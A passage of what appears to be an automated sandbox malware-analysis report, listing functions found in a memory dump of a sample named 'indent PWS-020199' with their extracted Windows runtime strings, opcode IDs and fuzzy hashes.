                            Function 0152E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: Legacy$UEFI
                            • API String ID: 2994545307-634100481
                            • Opcode ID: ff544caf31e9d4ccbf0127208402b0c9d7cf7dda54f2e4d93d61e1a0880ab94a
                            • Instruction ID: f940249c69548591e07ba92c5a0826a8c5f06ced41fc0dd75ad968b5f025d416
                            • Opcode Fuzzy Hash: ff544caf31e9d4ccbf0127208402b0c9d7cf7dda54f2e4d93d61e1a0880ab94a
                            • Instruction Fuzzy Hash: 7B616D72E002299FDB14DFA9C881BAEBBF5FB55700F14442EE649EB291D771E900CB50
                            Function 015543D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$MUI
                            • API String ID: 0-17815947
                            • Opcode ID: 57d8328be3c497aa5d0ce2bcfea32f04ff8b1bdef22c5ac8ab32baa91f016921
                            • Instruction ID: ab0f6e463ff38010de465b7f318d47c951f6d3ae2b312589d472f696d38ac3cb
                            • Opcode Fuzzy Hash: 57d8328be3c497aa5d0ce2bcfea32f04ff8b1bdef22c5ac8ab32baa91f016921
                            • Instruction Fuzzy Hash: 02511871D0021DAFDB11DFA9CC94EEEBBB8FB54754F10052AEA11BB290E6709E45CB60
                            Function 014B04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                            Download Yara Rule
                            Strings
                            • kLsE, xrefs: 014B0540
                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 014B063D
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                            • API String ID: 0-2547482624
                            • Opcode ID: 961179469a3d411eb01b27b72c04bc8dfd50cd6f2bdf311388ad546c81c0da01
                            • Instruction ID: 169e46c38418178ed2a95be6a84b49a5c85766fc457beefcd7aedab766e9a9c3
                            • Opcode Fuzzy Hash: 961179469a3d411eb01b27b72c04bc8dfd50cd6f2bdf311388ad546c81c0da01
                            • Instruction Fuzzy Hash: C451BB715007428BD724EF29C4806E7BBF4AF94305F10883FEAAA87761E730E545CBA2
                            Function 014BA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                            Download Yara Rule
                            Strings
                            • RtlpResUltimateFallbackInfo Exit, xrefs: 014BA309
                            • RtlpResUltimateFallbackInfo Enter, xrefs: 014BA2FB
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                            • API String ID: 0-2876891731
                            • Opcode ID: b5dee811b708dd3c608e3566c1a6c4e80468056f6c8ff099fc394039054ed61a
                            • Instruction ID: e40e05d34f0f381162dc300cdee200ef58d0d5bdf797388bd8291924d82ed589
                            • Opcode Fuzzy Hash: b5dee811b708dd3c608e3566c1a6c4e80468056f6c8ff099fc394039054ed61a
                            • Instruction Fuzzy Hash: 0141AF30A05649DBEB12DF59C480BAE7BB4FF94700F24806AE900DF3A5E375D941CB60
                            Function 014EA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: Cleanup Group$Threadpool!
                            • API String ID: 2994545307-4008356553
                            • Opcode ID: 1270f5c3063fcabcedf61b6331a0f3057f045b0fc1d245bf04d89b9c3960e102
                            • Instruction ID: d49ee98b739b474e3fe10c31a693d6b97736eda4245bf5ef7c0c346281555dd0
                            • Opcode Fuzzy Hash: 1270f5c3063fcabcedf61b6331a0f3057f045b0fc1d245bf04d89b9c3960e102
                            • Instruction Fuzzy Hash: 5A01ADB2240700AFD311DF24CE49B2677E8F795716F05897AA69CCB1A0E374D804CB46
                            Function 014BC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: MUI
                            • API String ID: 0-1339004836
                            • Opcode ID: 5d8bb688fcc9dd3cc9e5dfee201ecbfe27de5212d3c1f87a2a7eda452aa07400
                            • Instruction ID: 3ac641dbdf9bedcdd8018d4474855d3cc4043328944170d458e6997198de93f0
                            • Opcode Fuzzy Hash: 5d8bb688fcc9dd3cc9e5dfee201ecbfe27de5212d3c1f87a2a7eda452aa07400
                            • Instruction Fuzzy Hash: E9826075E002199FDB25CFA9C8C07EEBBB1BF48314F1481AAD959AB361D7309D42CB60
                            Function 01536420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-3916222277
                            • Opcode ID: c9774af6418308242e2b4d15a8c38aeb7cf456ec1edb2762b49aac87621a3422
                            • Instruction ID: a1bcaf6ba2fd310ed75299e13a3061643adbe994321ca4cb9da47f0c140c6d86
                            • Opcode Fuzzy Hash: c9774af6418308242e2b4d15a8c38aeb7cf456ec1edb2762b49aac87621a3422
                            • Instruction Fuzzy Hash: A5916271A00219BFEB21DF95CC95FAE7BB8FF54B50F154069F600AB1A0D775A900CB61
                            Function 0155E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-3916222277
                            • Opcode ID: 4a8774865f31443746883b3cf8b4fab1120100be0ae0a062912d58c5929951be
                            • Instruction ID: cf155ffc763c7908496c4245f0f305886fc8982f5a367dd1b9fa16969a70f387
                            • Opcode Fuzzy Hash: 4a8774865f31443746883b3cf8b4fab1120100be0ae0a062912d58c5929951be
                            • Instruction Fuzzy Hash: 7D91A132900606AFDB629F95DC55FAFFBB9FF55740F11002AF904AB261DB34AA01CB50
                            Function 014EA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: GlobalTags
                            • API String ID: 0-1106856819
                            • Opcode ID: 5516a4e73abdc986cc80b46e7c6660fc73e84bee5a55eb8dd00992f53f6d9f90
                            • Instruction ID: 3188b069a80dd46d0f616b4d2e07e3a762e448638b8946dc15922e3d4f6e23f9
                            • Opcode Fuzzy Hash: 5516a4e73abdc986cc80b46e7c6660fc73e84bee5a55eb8dd00992f53f6d9f90
                            • Instruction Fuzzy Hash: EA717076E0022ACFDF28CF9DD5906ADBBF1BF59710F14812EE905AB291E7709841CB50
                            Function 01554978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: .mui
                            • API String ID: 0-1199573805
                            • Opcode ID: 38536b9cd7cb1d853e23224774d71d0bdfbf1ad97a89118cce66e8976536f49e
                            • Instruction ID: 3bd9f7732fa7e0b9e82c7a5c4758db6fb458a09dfe025b5078598fce2e8157f4
                            • Opcode Fuzzy Hash: 38536b9cd7cb1d853e23224774d71d0bdfbf1ad97a89118cce66e8976536f49e
                            • Instruction Fuzzy Hash: F8519272D0022A9BDF90DFA9D850AEEBBB5BF14A10F05412BED15BF250E7749841CBA4
                            Function 014CE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: EXT-
                            • API String ID: 0-1948896318
                            • Opcode ID: 5b6716d7c57f37136f595391c2128093a2c769e733f2ed20c5080424ff7d89f0
                            • Instruction ID: c9927c52ccfe604bae69f3ffbcc217884c8ad1d75ae317650346e3a148ef7c3d
                            • Opcode Fuzzy Hash: 5b6716d7c57f37136f595391c2128093a2c769e733f2ed20c5080424ff7d89f0
                            • Instruction Fuzzy Hash: 5641C17A5093029BD761DA76C840B6FBBE8AF98A04F44092FF684F7260E774D905C792
                            Function 0152C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: BinaryHash
                            • API String ID: 0-2202222882
                            • Opcode ID: 1c352825921c115f9edaa526fa57d8c187bb005b34684941d22b7027565808fe
                            • Instruction ID: 233010fd1aa6017fbb8acfdaafa7a99b6ed9e0845192fd29e1e2bc1367866f4e
                            • Opcode Fuzzy Hash: 1c352825921c115f9edaa526fa57d8c187bb005b34684941d22b7027565808fe
                            • Instruction Fuzzy Hash: 754146F2D0052DAADB21DA50CC84FDE777CBB55714F0085A9E708AB191DB709E498FA4
                            Function 01546B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: #
                            • API String ID: 0-1885708031
                            • Opcode ID: 2a9f2cc16379b4199c6e5062595a313d63de7103d4a6090de5c05ef7d543176a
                            • Instruction ID: 691e4aa7f0c1c8be13e485550ceb0e3697f8c0b7da76789182fa61bb9205c090
                            • Opcode Fuzzy Hash: 2a9f2cc16379b4199c6e5062595a313d63de7103d4a6090de5c05ef7d543176a
                            • Instruction Fuzzy Hash: C3311831A007199BEB22CF69C854BAE7BA8EF16708F14402DE940AF292DB75DC45CB94
                            Function 0152CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: BinaryName
                            • API String ID: 0-215506332
                            • Opcode ID: 8e18a2997071cbed2aab9d00d753d99c14139cf8a200979899886ce11001ac55
                            • Instruction ID: 89eaea1803acb5bc0f4dbd8044849350882c652864046b247ed174fcbbb90a5d
                            • Opcode Fuzzy Hash: 8e18a2997071cbed2aab9d00d753d99c14139cf8a200979899886ce11001ac55
                            • Instruction Fuzzy Hash: AA31033790052AAFEB15DB59C851E6FBBB4FB92760F014169E905AB292D730DE00DBE0
                            Function 0153892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                            Download Yara Rule
                            Strings
                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0153895E
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                            • API String ID: 0-702105204
                            • Opcode ID: fde12851a52c08314b567e775b8251ecaba37bfb64aa39d9576f020510084848
                            • Instruction ID: d8d0775e743ac07b13e663e7ba4c7815b031c39f763dd2ebb3e791b96b953c76
                            • Opcode Fuzzy Hash: fde12851a52c08314b567e775b8251ecaba37bfb64aa39d9576f020510084848
                            • Instruction Fuzzy Hash: 0001F7332502119BE6296A5ADCC4E9E7BA5FFD1254B45062DF6411F161CB306845C7A2
                            Function 01552000 Relevance: .8, Instructions: 757COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: db1cd387bcb3b2c75c5181629776d7104308902864e616c56544e85cd27e504e
                            • Instruction ID: 25e614e4ccae556881060dff8699ee0da4a5cedf5fd2736fc9f0efe7887eec43
                            • Opcode Fuzzy Hash: db1cd387bcb3b2c75c5181629776d7104308902864e616c56544e85cd27e504e
                            • Instruction Fuzzy Hash: 1B42B036608341DBD765CF69C8A0A6FBBE5BB98340F08492FFE869B250D770D845CB52
                            Function 01548158 Relevance: .6, Instructions: 617COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bd3111c406f1d1bdf2bcf84a6adc000f251ee2be0740b3a44f98d6a7fd522d9d
                            • Instruction ID: eccbde87813e939daf4274240110933f86c3b5e3b7fde3619993e168ab429301
                            • Opcode Fuzzy Hash: bd3111c406f1d1bdf2bcf84a6adc000f251ee2be0740b3a44f98d6a7fd522d9d
                            • Instruction Fuzzy Hash: D3426D75E002198FEB24CFA9C881BADBBF5BF58304F14809EE949EB252D7349985CF50
                            Function 014C2840 Relevance: .6, Instructions: 605COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3f46fbef4b561d1d952398651c55157a2c837190ecb5a0873c08ea0129872a96
                            • Instruction ID: f5989598ba9770d0a22ad762bfa72ff5d273af42f2f626ec6d341591fb4e674e
                            • Opcode Fuzzy Hash: 3f46fbef4b561d1d952398651c55157a2c837190ecb5a0873c08ea0129872a96
                            • Instruction Fuzzy Hash: D8322474A007568FEB26CF69C844BBEBBF2BF84700F14451ED8469F289D7B4A842CB50
                            Function 0155A118 Relevance: .6, Instructions: 591COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d900d798d51313afd49450b0f34085d7c25fb675fdb556a78f0a79deac64b1e6
                            • Instruction ID: 03978feedb157566341959fe0f3de22a37daebb29365329a30923fa45a2979de
                            • Opcode Fuzzy Hash: d900d798d51313afd49450b0f34085d7c25fb675fdb556a78f0a79deac64b1e6
                            • Instruction Fuzzy Hash: B222C1706146618BEBA5CF2DC06077ABBF1BF44344F088A5BDD968F286E335E452CB60
                            Function 014B6A50 Relevance: .5, Instructions: 548COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 455ebc30cd12e4e582c79bc9c71e9028ca797be8da82c691e0e146bf68ec7559
                            • Instruction ID: 531c4e96c0b4706a8a2999a046ece8e7bf8ecbbcd483aeb0333bbae923fe6f5b
                            • Opcode Fuzzy Hash: 455ebc30cd12e4e582c79bc9c71e9028ca797be8da82c691e0e146bf68ec7559
                            • Instruction Fuzzy Hash: C0329C70A04615CFDB25CF69C4C0AAEBBF1FF48310F1545AAEA55AB3A5D730E842CB60
                            Function 014D4A35 Relevance: .4, Instructions: 423COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                            • Instruction ID: 42d2905fc96fa46c07adcc4a85188f4a04d3d40e7a77aadd371c92b926c28829
                            • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                            • Instruction Fuzzy Hash: 22F19271E0020A9FDF15CF99C5A0BAEBBF5BF48710F09812AE901AB764E774D842CB50
                            Function 0154892B Relevance: .4, Instructions: 386COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9ac60c98df281ad08768530760961e31e407778aafde28f50a4a9e7a925ef691
                            • Instruction ID: 01bb53339ed9e58d198bb16378ca7da95d2a74dfb5012f1d4c832da39cbb4b59
                            • Opcode Fuzzy Hash: 9ac60c98df281ad08768530760961e31e407778aafde28f50a4a9e7a925ef691
                            • Instruction Fuzzy Hash: 90D1E071A0060A9FDF05CFA9C841AFEB7F1BF88318F18856AD955AB241E735E905CB60
                            Function 014B65D0 Relevance: .4, Instructions: 383COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c88744b2cbbc8bf8538a366a768f1e2a7c789b2e3c211e5b2d210e8b18453dd1
                            • Instruction ID: 4ea97af75ab850d1f448ea1fb161371fae8b5858633a366df1e5c5bb442d3748
                            • Opcode Fuzzy Hash: c88744b2cbbc8bf8538a366a768f1e2a7c789b2e3c211e5b2d210e8b18453dd1
                            • Instruction Fuzzy Hash: 16E16D75508341CFC715CF28C4D0AABBBE1BF99314F06896EE9998B361DB31E905CBA1
                            Function 014A8397 Relevance: .4, Instructions: 380COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 76f60b3fa9faa541b9d331a2b4d144826d8f8f2a447402ea904c91c4f224a5e9
                            • Instruction ID: 2a1aec650d2dbe23714ca3e3df1fabd70d9a1b2b32a47ece701a6a820b810191
                            • Opcode Fuzzy Hash: 76f60b3fa9faa541b9d331a2b4d144826d8f8f2a447402ea904c91c4f224a5e9
                            • Instruction Fuzzy Hash: 3BD1E175A006079BDB15CF69CC80EBE7BB5FF64205F46422EE916DB2A0EB30D951CB60
                            Function 01538243 Relevance: .3, Instructions: 322COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                            • Instruction ID: 666c823b1f11cfb02e0ef5ba0a38a7f79589662670e73bb8826049fd0622775c
                            • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                            • Instruction Fuzzy Hash: 6CB15E74A00605AFDF28DB99C940EAFBBB9BFC4304F14456DBA529B791DA34E909CB10
                            Function 014C0535 Relevance: .3, Instructions: 300COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                            • Instruction ID: 4a1e98d25dcb66a0ac3fe2b0eb5c003766eed422cf75a70ca94c632288bb4a67
                            • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                            • Instruction Fuzzy Hash: 13B1E339600646DFEB16CBA8C850BBEBBF6BF94700F14415EE6529B395D730E942CB90
                            Function 014B83C0 Relevance: .3, Instructions: 281COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6f6aff7a7204d9fd01659013fc8c55ba6addd687eacd54456570a03200bf701e
                            • Instruction ID: cf7cde58c03545fe84b5bd329fb61fc8f4736ad086d0ecbeb4f7be6548e8903a
                            • Opcode Fuzzy Hash: 6f6aff7a7204d9fd01659013fc8c55ba6addd687eacd54456570a03200bf701e
                            • Instruction Fuzzy Hash: 74C15A741083418FE764DF19C484BABB7E5BF98304F44496EE9898B3A1D774E904CF62
                            Function 014AC427 Relevance: .3, Instructions: 280COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e3dca18ac0865c4a2424bb75db459cca0e4d82be2d3820378f946c0809fec30c
                            • Instruction ID: a79acf5f8ca07696c715080a16dccba2cb7a88f1fac2cc75b4590594d3f29c4c
                            • Opcode Fuzzy Hash: e3dca18ac0865c4a2424bb75db459cca0e4d82be2d3820378f946c0809fec30c
                            • Instruction Fuzzy Hash: A0B17270A002668BDB65CF59C890BADB3B5EF54700F4585EAE54AEB391DB309D86CB20
                            Function 014DE5E7 Relevance: .3, Instructions: 278COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f3e52d2b2edef6fe92930e6c8bf43f51e97c6c7bfd19f3af3d5c0501f38b1e3d
                            • Instruction ID: 2c14c355655e17e9b5e73eb0158e94e8141c7e7966d668d39ad191fc683d7ca2
                            • Opcode Fuzzy Hash: f3e52d2b2edef6fe92930e6c8bf43f51e97c6c7bfd19f3af3d5c0501f38b1e3d
                            • Instruction Fuzzy Hash: D9A10131E04619AFEF22DB98C854FAEBBA4BB00714F05012BEA10BF2E5D7749D45CB91
                            Function 014F0185 Relevance: .3, Instructions: 276COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 231b91d7c4de3fa3f926fcbc69ebcc2f1e01896e185c969d84d164837620089d
                            • Instruction ID: b2c5640f664833471866fe769cf3ac2e40f19b2b54c663e6a193fac6d595e806
                            • Opcode Fuzzy Hash: 231b91d7c4de3fa3f926fcbc69ebcc2f1e01896e185c969d84d164837620089d
                            • Instruction Fuzzy Hash: 6BA1C471B006269FDB25DF69C490BAAB7E2FF94314F14402EEB059B3A2DB74E812C750
                            Function 01584500 Relevance: .3, Instructions: 275COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 420e67a067b7f18c3f80bf878dd1695c008ba30865781120c3629526d320428d
                            • Instruction ID: c29ea4637456fff3e9421aa70d171b4dc3716533247e08d41dd68d3301680af7
                            • Opcode Fuzzy Hash: 420e67a067b7f18c3f80bf878dd1695c008ba30865781120c3629526d320428d
                            • Instruction Fuzzy Hash: 42A1DD72A10252DFC711EF19C980B6ABBE9FF58704F45092DEA86EB660D374E901CB91
                            Function 01582B57 Relevance: .3, Instructions: 266COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                            • Instruction ID: dfabd05c7b3035e3fb972e84fe72c0ff4393aeb1729d3fe00bab11aa1b0a3d59
                            • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                            • Instruction Fuzzy Hash: DFB12875E0161ADFDF19DFA9C880AADBBF5BF48310F14812AE915BB350D730A941CB94
                            Function 015360E0 Relevance: .3, Instructions: 264COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 57b8753d29ca7364c4e0d17896b8e9a886eceb69fe20fca3deb6d1a21419adea
                            • Instruction ID: 847c0171c857aa09473a773a5b7b22119685a9d9190d6140c0eae5f302bad964
